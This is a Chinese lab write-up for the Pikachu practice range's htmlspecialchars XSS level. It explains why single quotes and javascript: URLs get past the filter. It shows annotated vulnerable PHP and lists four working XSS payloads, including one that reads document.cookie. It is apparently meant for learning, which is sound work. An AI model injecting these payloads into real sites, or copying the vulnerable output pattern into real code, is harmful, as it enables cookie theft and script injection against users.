pikachu靶场通关笔记12 XSS关卡08-XSS之htmlspecialchars(四种方法渗透)

目录

一、htmlspecialchars

二、源码分析

1、进入靶场

2、代码审计

3、渗透思路

(1)利用单引号绕过

(2)利用协议绕过

三、渗透实战

1、探测是否有过滤

2、注入payload1

3、注入payload2

4、注入payload3

5、注入payload4


本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到安全风险的真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第08关卡XSS之htmlspecialchars关卡的渗透部分。

一、htmlspecialchars

PHP 的 htmlspecialchars ()函数 用于将特殊字符转换为 HTML 实体,防止 XSS 攻击。函数的基本语法如下所示。

复制代码
string htmlspecialchars(
    string $string,
    int $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401,
    ?string $encoding = null,
    bool $double_encode = true
)

htmlspecialchars 函数的主要参数含义如下所示。

参数 可选值/示例 作用
$flags ENT_QUOTES 转义单双引号(推荐)
ENT_COMPAT 仅转义双引号
ENT_NOQUOTES 不转义任何引号
$encoding 'UTF-8'(推荐) 指定字符编码,避免乱码
$double_encode true(默认) 是否对已转义的字符再次转义

htmlspecialchars函数主要转义以下 5 个字符,具体如下所示。

原始字符 转义后实体 用途说明
& & 避免混淆 HTML 实体
" " 转义双引号(属性值用)
' ' 转义单引号(属性值用)
< &lt; 避免标签被解析
> &gt; 避免标签被解析
  • 尽管htmlspecialchars 函数对用户输入进行处理,可以防范XSS安全风险,它并非能抵御所有类型的 XSS 攻击,以下是它无法有效防御的几类情况::

    • 事件处理属性:在 HTML 标签里,很多属性可用于触发 JavaScript 代码,例如 onclickonloadonmouseover 等。要是攻击者把恶意脚本注入到这些事件处理属性中,htmlspecialchars 就可能无法有效防御。

    • 协议攻击:攻击者可通过构造包含恶意协议(如 javascript:、data:)的 URL 来实施攻击。htmlspecialchars 虽然会对特殊字符进行编码,但无法阻止恶意协议的使用。

    • 单引号绕过情况:htmlspecialchars 默认不会对单引号进行编码(除非指定 ENT_QUOTES 或 ENT_COMPAT 标志)。攻击者可利用单引号来绕过过滤,注入恶意脚本。

二、源码分析

1、进入靶场

打开pikachu靶场第08关XSS之htmlspecialchars,完整URL地址如下所示,这是一个输入框页面,如下所示。

复制代码
http://127.0.0.1/pikachu/vul/xss/xss_02.php

2、代码审计

查看xss_02.php源码内容,如下所示使用htmlspecialchars函数对输入参数进行了过滤处理,具体如下所示。

这段 PHP 代码的主要功能是处理用户通过 GET 请求提交的 message 参数。当用户提交表单(即 submit 参数存在)时,会进行如下操作:

  • 检查 message 是否为空,如果为空,提示用户输入内容。
  • 如果 message 不为空,使用 htmlspecialchars 函数对其进行处理,将特殊字符转换为 HTML 实体。
  • 提示用户输入内容已被记录,并将处理后的内容以超链接的形式展示在页面上。

对源码进行详细注释,具体如下所示。

复制代码
<?php
// 初始化三个空字符串变量,用于存储不同的 HTML 内容
// $html 用于存储提示信息
$html = '';
// $html1 用于存储记录输入的提示信息
$html1 = '';
// $html2 用于存储包含用户输入内容的 HTML 元素
$html2 = '';

// 检查 $_GET 数组中是否存在名为 'submit' 的元素
// 即判断用户是否通过 GET 请求提交了 'submit' 参数,以此来确认用户是否进行了提交操作
if (isset($_GET['submit'])) {
    // 检查 $_GET 数组中名为 'message' 的元素是否为空
    if (empty($_GET['message'])) {
        // 如果 'message' 为空,向 $html 变量中追加一段提示信息
        // 提示用户输入点内容
        $html .= "<p class='notice'>输入点啥吧!</p>";
    } else {
        // 如果 'message' 不为空,使用 htmlspecialchars 函数对用户输入的 'message' 内容进行处理
        // htmlspecialchars 函数会将特殊字符转换为 HTML 实体,如将 < 转换为 &lt;,> 转换为 &gt; 等
        // 但默认情况下,单引号 ' 不会被处理
        $message = htmlspecialchars($_GET['message']);

        // 向 $html1 变量中追加一段提示信息
        // 告知用户输入的内容已经被记录
        $html1 .= "<p class='notice'>你的输入已经被记录:</p>";


        // 实际使用的代码,将处理后的内容作为超链接的 href 属性和显示文本
        // 即创建一个超链接,链接地址和显示文本都是用户输入的内容
        $html2 .= "<a href='{$message}'>{$message}</a>";
    }
}
?>

3、渗透思路

虽然代码使用了 htmlspecialchars 函数对用户输入进行处理,但仍然有XSS安全风险,渗透思路如下:

(1)利用单引号绕过

由于 htmlspecialchars 默认不对单引号 ' 进行处理,攻击者可以构造包含单引号的恶意输入。例如,当用户输入 ' οnclick='alert('XSS') 时,最终生成的 HTML 代码会变成:

复制代码
<a href='' onclick='alert('XSS')'>' onclick='alert('XSS')</a>

当用户点击这个超链接时,就会触发 onclick 事件,执行其中的 JavaScript 代码,弹出包含 XSS 的警告框。

(2)利用协议绕过

攻击者可以构造包含恶意协议的输入,如 javascript:alert('XSS')。当用户输入该内容时,最终生成的 HTML 代码为:

复制代码
<a href='javascript:alert('XSS')'>javascript:alert('XSS')</a>

当用户点击这个超链接时,浏览器会执行 javascript 协议指定的代码,从而触发 XSS 攻击。

三、渗透实战

1、探测是否有过滤

进入pikachu靶场的第08关卡xss之htmlspecialchars,注意这是一个带有输入框的页面,如下所示。

复制代码
http://127.0.0.1/pikachu/vul/xss/xss_02.php

接下来输入关键字判断是否有过滤,关键字包括:单引号、双引号、左右尖括号、问号、&、字符串与数字'"<>'ljn'"20141019"%#?,具体如下所示。

复制代码
'"<>'ljn'"20141019"%#?

发现<a>标签内还是href属性内,左右尖括号被编码,双引号被替编码为了&quot,但是单引号居然没有被html编码,可以利用<a>标签。

2、注入payload1

ljn' οnfοcus='alert(1019)'

3、注入payload2

ljn' οnclick='alert(1019)'

4、注入payload3

ljn' οnclick='alert(document.cookie)'

5、注入payload4

javascript:alert(1019)

相关推荐
FairGuard手游加固9 分钟前
FairGuard游戏安全2025年度报告
安全·游戏
九河云32 分钟前
华为云SDRS跨Region双活:筑牢证券核心系统零中断防线
大数据·人工智能·安全·机器学习·华为云
汽车通信软件大头兵44 分钟前
Autosar--ETAS Isolar能够自由学习啦!
网络·学习·安全·汽车·etas·uds·isoalr
Digitally1 小时前
如何高效安全地将 iPhone 与 Mac 同步
安全·macos·iphone
xiatianxy1 小时前
电力行业有限空间作业升级:云酷科技以智能设备筑牢安全防线
科技·安全·有限空间作业·有限空间监测设备
云里雾里!1 小时前
拆解 OAuth2 实现 SSO 的核心流程
安全
emma羊羊1 小时前
Vulhub-AppWeb
网络·安全·web安全·vulhub
白山云北诗1 小时前
AI大模型的使用规范建议:安全、合规与高效并重
人工智能·安全·ai·网站安全
乾元1 小时前
IoT 大量接入场景下的网络切片与安全隔离——AI 驱动的策略生成、验证与落地工程
运维·网络·人工智能·物联网·网络协议·安全
戴西软件1 小时前
戴西发布 DLM许可证加密防护软件V4.2让工业软件授权迈入并发调度与精细治理时代
运维·服务器·网络·数据库·人工智能·安全·云计算